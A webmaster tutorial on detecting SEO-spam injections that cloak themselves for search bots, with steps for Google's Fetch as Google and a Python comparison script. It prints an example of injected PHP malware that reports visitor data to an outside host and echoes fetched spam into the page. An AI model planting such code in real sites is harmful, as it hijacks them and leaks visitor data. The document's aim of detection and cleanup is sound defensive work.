How to debug hacked sites with Google

These days, hackers often break into sites and plant their own links in the pages for SEO purposes.

The injected code serves the attacker's URLs only when a search engine bot requests the page, so you can't see it while debugging your site normally (it doesn't appear to regular visitors, only to search engine bots).
Google lets you debug a hacked site with the Fetch as Google tool, which shows you a page exactly as Google sees it. This is particularly useful when you're troubleshooting a page's poor performance in search results.


The injected PHP code typically looks like this:
<?php
// Malicious "statistics" snippet: it phones home to the attacker's server
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Look for the Google search bot
$sReferer = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $sReferer = strtolower($_SERVER['HTTP_REFERER']);
}
$stCurlHandle = NULL;
if (strpos($sUserAgent, 'google') !== false) { // A bot is visiting
    if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['HTTP_HOST'])) { // Report the visit to the attacker
        $stCurlHandle = curl_init('http://xxxxx.net/Stat/StatJ/Stat.php?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
            . '&useragent=' . urlencode($sUserAgent)
            . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
            . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
            . '&check=' . isset($_GET['look'])
            . '&ref=' . urlencode($sReferer));
    }
} else {
    if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['HTTP_HOST'])) {
        $stCurlHandle = curl_init('http://xxxxx.net/Stat/StatJ/Stat.php?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
            . '&useragent=' . urlencode($sUserAgent)
            . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
            . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
            . '&addcheck=' . '&check=' . isset($_GET['look'])
            . '&ref=' . urlencode($sReferer));
    }
}
if ($stCurlHandle !== NULL) { // Only call cURL if a handle was actually created
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); // Fetch the attacker's payload...
    curl_close($stCurlHandle);
    echo $sResult; // ...and inject it into the page
}
?>
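To make the behavior clearer, here is a minimal sketch in Python of the cloaking logic the PHP snippet above implements. The function name, the sample content, and the spam payload are made up for illustration; the point is only that the injected links appear when the User-Agent looks like a Google bot, and never for a normal browser:

```python
# Placeholder payload, mimicking the spam links the attacker's server returns
SPAM_LINKS = '<a href="http://xxxxx.net/spam">spam</a>'

def render_page(user_agent: str, body: str = "<p>Normal content</p>") -> str:
    """Return the page HTML, appending spam links only for search bots."""
    # Same test as strpos($sUserAgent, 'google') in the PHP snippet
    if "google" in user_agent.lower():
        return body + SPAM_LINKS
    return body

# A regular visitor sees only the normal content...
print(render_page("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))
# ...but Googlebot gets the injected links appended.
print(render_page("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"))
```

This is exactly why browsing your own site, or viewing its source in a browser, will never show the hack: only requests that identify themselves as Google see the spam.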

How do you check it?

1. Log in to Google Webmaster Tools at http://google.com/webmasters/. On the Webmaster Tools home page, click the site you want.
2. On the Dashboard, under Health, click Fetch as Google.
3. In the text box, type the path to the page you want to check, for example: http://www.joomquery.com
4. In the dropdown list, select the type of fetch you want. To see what Google's web crawler Googlebot sees, select Web. To see what the mobile crawler Googlebot-Mobile sees, select cHTML (used mainly for Japanese websites) or Mobile XHTML/WML.
5. Click Fetch.

You can use this tool to fetch up to 500 URLs a week per Webmaster Tools account.

Note: Fetch as Google is designed to help webmasters troubleshoot potential issues with the crawling of their site. While the tool reflects what Google sees, there may be some differences. For example, Fetch as Google does not follow redirects.
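You can also approximate the same check yourself: fetch the page once with a normal browser User-Agent and once with Googlebot's, and compare the results. The sketch below is self-contained for illustration, so it spins up a tiny local web server that cloaks the same way the PHP snippet does; against a real site you would point the URL at your own domain instead (the handler class, URLs, and payload here are all hypothetical):

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class CloakingHandler(BaseHTTPRequestHandler):
    """Toy server that injects spam links only for Google bots."""
    def do_GET(self):
        body = "<p>Normal content</p>"
        ua = self.headers.get("User-Agent", "").lower()
        if "google" in ua:  # same check as the PHP snippet
            body += '<a href="http://xxxxx.net/spam">spam</a>'
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request logging
        pass

# Start the toy cloaking server on a free local port
server = HTTPServer(("127.0.0.1", 0), CloakingHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
base_url = "http://127.0.0.1:%d/" % server.server_address[1]

def fetch(url, user_agent):
    """Fetch a URL while presenting the given User-Agent string."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()

normal = fetch(base_url, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")
as_bot = fetch(base_url, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)")
print("Pages differ:", normal != as_bot)  # prints "Pages differ: True" on a cloaked site
server.shutdown()
```

Any links present in the bot fetch but missing from the normal fetch are likely injected. Note that sophisticated malware also checks the visitor's IP address, not just the User-Agent, so a clean diff here does not guarantee the site is clean; Fetch as Google remains the more reliable check.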
